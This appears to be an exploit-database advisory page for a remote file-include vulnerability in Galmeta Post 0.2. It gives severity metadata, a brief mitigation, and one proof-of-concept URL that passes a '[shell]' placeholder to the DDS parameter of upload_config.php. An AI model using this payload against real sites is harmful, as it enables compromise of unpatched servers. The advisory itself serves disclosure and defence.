header-logo
Suggest Exploit
vendor:
Galmeta Post
by:
Unknown
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Galmeta Post
Affected Version From: 0.2
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Galmeta Post Remote File Include Vulnerability

Galmeta Post is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Mitigation:

It is recommended to sanitize user-supplied data before including it in any file or URL. Additionally, keep the software up to date to prevent such vulnerabilities.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26329/info

Galmeta Post is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Galmeta Post 0.2 is vulnerable; other versions may also be affected. 

http://www.example.comtmp/post_static_0-11/_lib/fckeditor/upload_config.php?DDS=[shell]